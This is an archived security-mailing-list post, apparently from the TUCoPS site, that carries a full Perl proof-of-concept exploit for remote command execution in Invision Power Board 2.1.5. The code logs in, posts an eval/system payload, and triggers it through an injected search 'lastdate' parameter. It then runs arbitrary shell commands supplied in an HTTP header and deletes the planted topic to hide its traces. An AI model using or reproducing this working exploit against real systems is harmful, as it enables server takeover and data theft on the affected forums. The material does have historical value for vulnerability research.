TUCoPS :: Web BBS :: Frequently Exploited :: b06-1930.htm

Invision Power Board 2.1.5 POC
Invision Power Board 2.1.5 POC
Invision Power Board 2.1.5 POC



This is a MIME-formatted message.  If you see this text it means that your
E-mail software does not support MIME-formatted messages.

--=_gantz-30888-1146139877-0001-2
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Proof of concept for http://www.securityfocus.com/bid/17695/ can be 
found in www.514.es 

LINK: http://www.514.es/download/invvy-v2.pl 

Best regards,

- J



--=_gantz-30888-1146139877-0001-2
Content-Type: text/plain; name="invvy-v2.pl"; charset=iso-8859-1
Content-Disposition: inline;
 filename="invvy-v2.pl"
Content-Transfer-Encoding: quoted-printable

#!/usr/bin/perl
# Wed Apr 26 16:44:15 CEST 2006 jolascoaga@514.es 
#
# INVISION POWER BOARD 2.1.5  pr00f 0f c0ncept 
#
# remote command execution. vuln credits goes to IceShaman.
#
# works only if you have perms to post a comment. Exploit with replye is
# in my TODO... 
#
# 514 still r0xing.
# !dSR the hardc0re hax0rs ;)
# There is no kwel comments in this release, wait for next upgrade
#######################################################################/

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1; # ;1 = |$

my ($proxy,$proxy_user,$proxy_pass,$lang);
my ($arg_host,$debug,$ipb_user,$ipb_pass, $lang, $errors, $topic_index, $tmp_var);
my ($md5_key, $post_key, $tmp_var);

my %lang_es = (
	'name' => 'Spanish Language',
	'login' => "Ahora est=E1s identificado",
	'incorrect' => "Nombre de usuario o contrase=F1a incorrectos",
	'deleted' => "Tema Eliminado"
);

my %lang_en = (
	'name' => 'English language',
	'login' =>  "You are now logged in",
        'incorrect' => "Sorry, we could not find a member using those log in details",
	'deleted'  => 'Topic Deleted',
);
my %lang_strings = ();

my $ua = new LWP::UserAgent(
            cookie_jar=> { file => "$$.cookie" });

my $options = GetOptions (
  'host=s'            => \$arg_host, 
  'proxy=s'           => \$proxy,
  'proxy_user=s'      => \$proxy_user,
  'proxy_pass=s'      => \$proxy_pass,
  'ipb_user=s'        => \$ipb_user,
  'ipb_pass=s'        => \$ipb_pass,
  'lang=s'	      => \$lang,
  'errors'	      => \$errors,
  'debug'             => \$debug);

my ($host, $forum_index) = $arg_host =~ m/(http.*?)index.*?showforum=(.*)/;
print "Host: $host\nForum Index: $forum_index\n" if $debug;

&help unless ($host);

# w0w0w0w0w0 is smarter than some one i know :D
if (!$lang) {
	lang_autodetect();
	print "Detected lang is: $lang_strings{'name'}\n" if $debug;
}

while (1){
    print "invvy:\\> ";
    my $cmd = ;
    &invvy($cmd);
}

sub invvy {
    	chomp (my $cmd = shift);
    	LWP::Debug::level('+') if $debug;

    	$ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");

    	$ua->proxy(['http'] => $proxy) if $proxy;
    	my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
=09
	ipb_login (); # This works with redirects enabled/disabled


	ipb_post(); # Post in a main forum.

	ipb_exec ($cmd);

	ipb_delete ($forum_index, $topic_index);
}
# guglucitos team presents:

sub help {
    print "Syntax: ./$0  [options]\n";
    print "\t--ipb_user, --ipb_pass  (needed if dont allow anonymous posts)\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--lang=[es|en] (default: autodetect)\n";
    print "\t--debug\n";
    print "\t--errors\n";
    print "\nExample\n";
print "bash# $0 --host=http://www.somehost.com/index.php?showforum=2\n"; 
    print "\n";
    exit(1);
}

# sponsorized by coca-cola
sub lang_autodetect {

    my $req = HTTP::Request->new (GET => $host."/index.php");
    $ua->proxy(['http'] => $proxy) if $proxy;
    $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

    print $req->as_string() if $debug;

    my $res = $ua->request($req);
    my $html = $res->content();
   
    if (($html =~ /Bienvenido,/) or  ($html =~ /Fecha y Hora actual/)) {
		%lang_strings =  %lang_es;
		return;
    }
    if (($html =~ /Welcome,/) or ($html =~ /Time is now/)) {
		%lang_strings = %lang_en;
		return;
    }
    print "Unknown lang switching to default: 'english'\n";
    %lang_strings =  %lang_en;
}

# login function for 2.1.5
sub ipb_login {
	my $content;
        my $h = $host."/index.php?act=Login&CODE=01";
        print $h . "\n" if $debug;
        my $req = POST $h,[
                'referer' => $host,
                'UserName' => $ipb_user,
                'PassWord' => $ipb_pass,
                'CookieDate' => 1
                ]; #grab these, and send to dsr!
        print $req->as_string() if $debug;
        my $res = $ua->request($req);
	if ($errors) {
		print "[+] Context: Login in\n";
		print "HTTP Error code: ".$res->code()."\n";
		print "HTTP Location: ".$res->header("Location")."\n";
	        my ($error) = $res->content() =~ m/(.*?)<\/body>/s;
	        print "- ERROR -\nFind string: ".$lang_strings{'login'}."\n$error\n- ERROR -\n";
	}
	if ($res->code() eq 302) {
		$content = redirect ($res->header("Location"));
	=09
	} else {

		$content = $res->content();
	}

        if ($content =~ /$lang_strings{'login'}/ or $content =~ /Logged in as/) {
            print "Logged in\n" if $errors;
        } else {
           die "Can't log in\n";
        }
=09
}

sub redirect {
    my ($addr) = @_;
    my $req = HTTP::Request->new (GET => $addr);
    $ua->proxy(['http'] => $proxy) if $proxy;
    $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

    print $req->as_string() if $debug; # MKSINK is r0xer

    my $res = $ua->request($req);
    my $html = $res->content();

    return $html;
}=09

sub ipb_post {
    	# This is for posting into a main index.

    	my $h = $host."/index.php?act=post&do=new_post&f=".$forum_index;

    	my $req = HTTP::Request->new (GET => $h);
    	$ua->proxy(['http'] => $proxy) if $proxy;
    	$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

    	print $req->as_string() if $debug; #dirty_epic r0x++

    	my $res = $ua->request($req);
    	my $html = $res->content();

    	($md5_key) = $html =~ m/var ipb_md5_check\s+= \"(.*?)\"/;
    	($post_key) = $html =~ m/post_key' value='(.*?)'/;

   	print "AUTH check: $md5_key\n" if $debug;
    	print "POST key: $post_key\n" if $debug;

    	$tmp_var = int(rand(31337));
    	my $exploitme = 'eval(system(getenv(HTTP_'.$tmp_var.'))); //'; # seeeeeei la weeeeei
    	$h = $host."/index.php";

	print $h."\n" if $debug;

	my $req = POST $h, [
                'st' => 0,
                'act' => "Post",
                's' => '',
                'f' => $forum_index,
                'auth_key' => $md5_key,
                'removeattachid' => 0,
                'MAX_FILE_SIZE' => 51200000,
                'CODE' => '01',
                'post_key' => $post_key,
                'TopicTitle' => '514 pwned',
                'TopicDesc' => '',
                'poll_question' => '',
                'ffont' => 0,
                'fsize' => 0,
                'Post' => $exploitme,
                'post_htmlstatus' => 0,
                'enableemo' => 'yes',
                'enablesig' => 'yes',
                'mod_options' => 'nowt',
                'iconid' => 0,
                'dosubmit' => 'Post New Topic'
                ];

	$ua->proxy(['http'] => $proxy) if $proxy;
        $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

        print $req->as_string() if $debug;
        my $res = $ua->request($req);
        my $html = $res->content();

        print "Location: ".$res->header("Location") if $debug;
	($topic_index) = $res->header("Location") =~ m/showtopic=(\d+)/;
	if ($errors) {
		print "[+] Context: Creating post\n";
                print "HTTP Error code: ".$res->code()."\n";
                print "HTTP Location: ".$res->header("Location")."\n";
		print "Topic Index: ".$topic_index."\n";
                my ($error) = $res->content() =~ m/(.*?)<\/body>/s;
                print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";	=09
	}

}

sub ipb_delete {
	my ($fid, $tid) = @_;
	my $req;=09
	print "Deleting Topic: $tid from forum: $fid\n" if $debug;

        my $h = $host."/index.php";
        $req = POST $h, [
                        'st' => 0,
                        'act' => 'mod',
                        'f' => $fid,
                        'auth_key' => $md5_key,
                        'CODE' => '08',
                        't' => $tid,
                        'submit' => 'Delete this topic'
                ]; # fuck windows automatic reboot
        print $req->as_string() if $debug;
        $ua->proxy(['http'] => $proxy) if $proxy;
        $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

        my $res = $ua->request($req);

        if ($errors) {
		print "[+] Context: Deleting Topic\n";
                print "HTTP Error code: ".$res->code()."\n";
                print "HTTP Location: ".$res->header("Location")."\n";
                print "Topic Index: ".$topic_index."\n";
                my ($error) = $res->content() =~ m/(.*?)<\/body>/s;
                print "- ERROR -\nFind string: ".$lang_strings{'deleted'}."\n$error\n- ERROR -\n";
        }
	# yow yow
	if ($res->code() eq 200) {
		 if ($res->content() =~ /$lang_strings{'deleted'}/) {
			print "Topic $topic_index deleted\n" if $errors;
		} else {
			print "Maybe there was errors deleting post: $topic_index\n" if $errors;
		}
	}
}

# shhhhh this is hidden
sub ipb_exec {=09
	my ($cmd) = @_;
        my $h = $host."/index.php?act=Search&CODE=01";
        my $req = POST $h, [
                        'keywords' => "HTTP_".$tmp_var,
                        'namesearch' => '',
                        'forums[]' => $forum_index,
                        'prune' => 0,
                        'prune_type' => 'newer',
                        'result_type' => 'posts',
                        'search_in' => 'posts',
                        'sort_key' => 'last_post',
                        'searchsubs' => '1'
                ];
        print $req->as_string() if $debug;
        $ua->proxy(['http'] => $proxy) if $proxy;
        $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

        my $res = $ua->request($req);
        my $html = $res->content();

        my ($redir) = $html =~ m/url_bit.*?\"(.*?)\"/;
        print "Redirect to: $redir\n" if $errors; # don't ask 

        if ($errors) {
		print "[+] Context: First search\n";
                print "HTTP Error code: ".$res->code()."\n";
                print "HTTP Location: ".$res->header("Location")."\n";
                print "Topic Index: ".$topic_index."\n";
                my ($error) = $res->content() =~ m/(.*?)<\/body>/s;
                print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
        }

	if ($res->code eq 302) {
		$redir = $res->header("Location");
	}

	# piere - tonite is a great song
        my $req = HTTP::Request->new (GET => $redir.'&lastdate=z|eval.*?%20//)%23e%00');
        $ua->proxy(['http'] => $proxy) if $proxy;
        $req->header($tmp_var => 'echo STARTXPL;'.$cmd.';echo ENDXPL');
        $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

        print $req->as_string() if $debug;

        my $res = $ua->request($req);
        my $html = $res->content();

        $html =~ m/STARTXPL(.*?)ENDXPL/s;
        print $1."\n";

	# no matter with you
        if ($errors) {
		print "[+] Context: Executed\n";
                print "HTTP Error code: ".$res->code()."\n";
                print "HTTP Location: ".$res->header("Location")."\n";
                print "Topic Index: ".$topic_index."\n";
                my ($error) = $res->content() =~ m/(.*?)<\/body>/s;
                print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
        }

}
# be aware with la roca peoplee

--=_gantz-30888-1146139877-0001-2--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH